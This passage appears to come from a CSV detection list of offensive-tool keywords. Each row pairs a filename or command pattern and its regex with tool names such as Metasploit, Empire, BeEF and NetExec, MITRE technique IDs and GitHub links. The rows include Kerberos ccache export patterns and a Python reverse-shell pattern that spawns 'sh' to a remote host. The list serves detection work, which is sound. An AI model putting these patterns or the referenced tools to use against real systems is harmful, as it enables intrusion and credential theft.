Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*expl-bin*",".{0,1000}expl\-bin.{0,1000}","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*explib2_ie11_exec_test_case.rb*",".{0,1000}explib2_ie11_exec_test_case\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exploit*wordpress_add_admin*",".{0,1000}exploit.{0,1000}wordpress_add_admin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*exploit.bash*",".{0,1000}exploit\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bat*",".{0,1000}exploit\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bin*",".{0,1000}exploit\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.c*",".{0,1000}exploit\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.com*",".{0,1000}exploit\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.exe*",".{0,1000}exploit\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.msi*",".{0,1000}exploit\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.pl*",".{0,1000}exploit\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.ps1*",".{0,1000}exploit\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.py*",".{0,1000}exploit\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.reg*",".{0,1000}exploit\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.run*",".{0,1000}exploit\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.sh*",".{0,1000}exploit\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vb*",".{0,1000}exploit\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbe*",".{0,1000}exploit\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbs*",".{0,1000}exploit\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbscript*",".{0,1000}exploit\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.zsh*",".{0,1000}exploit\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit_frameworks.py*",".{0,1000}exploit_frameworks\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*exploit_fuse.c*",".{0,1000}exploit_fuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_kctf.c*",".{0,1000}exploit_kctf\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_oneline.md*",".{0,1000}exploit_oneline\.md.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" "*exploit_suggester *",".{0,1000}exploit_suggester\s\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*exploit_suggester.*",".{0,1000}exploit_suggester\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*exploit_suggester.py*",".{0,1000}exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Exploitation Toolkit*",".{0,1000}Exploitation\sToolkit.{0,1000}","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RUB-NDS/PRT","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*exploit-database-bin-sploits/*",".{0,1000}exploit\-database\-bin\-sploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*Exploit-JBoss -*",".{0,1000}Exploit\-JBoss\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-JBoss.ps1*",".{0,1000}Exploit\-JBoss\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-JBoss.ps1*",".{0,1000}Exploit\-JBoss\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-Jenkins*",".{0,1000}Exploit\-Jenkins.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-Jenkins.ps1*",".{0,1000}Exploit\-Jenkins\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-JMXConsole*",".{0,1000}Exploit\-JMXConsole.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*exploits*_csrf/*.js*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*exploits*_csrf/*.rb*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*exploits/*_macro*",".{0,1000}exploits\/.{0,1000}_macro.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exploits/CVE-*",".{0,1000}exploits\/CVE\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exploits-forsale/prefetch-tool*",".{0,1000}exploits\-forsale\/prefetch\-tool.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*exploit-suggester*",".{0,1000}exploit\-suggester.{0,1000}","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","10","3849","1011","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z" "*ExploitTest.cpp*",".{0,1000}ExploitTest\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*ExploitTest.vcxproj*",".{0,1000}ExploitTest\.vcxproj.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*export KRB5CCNAME=*.ccache*",".{0,1000}export\sKRB5CCNAME\=.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*export KRB5CCNAME=/*/impacket/administrator.ccache* ",".{0,1000}export\sKRB5CCNAME\=\/.{0,1000}\/impacket\/administrator\.ccache.{0,1000}\s","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*export NEMESIS_BASE_URL*",".{0,1000}export\sNEMESIS_BASE_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*export NEMESIS_CREDS*",".{0,1000}export\sNEMESIS_CREDS.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*export RHOST=*export RPORT=*python3 -c*socket.socket()*connect*os.getenv(""RHOST"")*pty.spawn(""sh"")*",".{0,1000}export\sRHOST\=.{0,1000}export\sRPORT\=.{0,1000}python3\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}os\.getenv\(\""RHOST\""\).{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 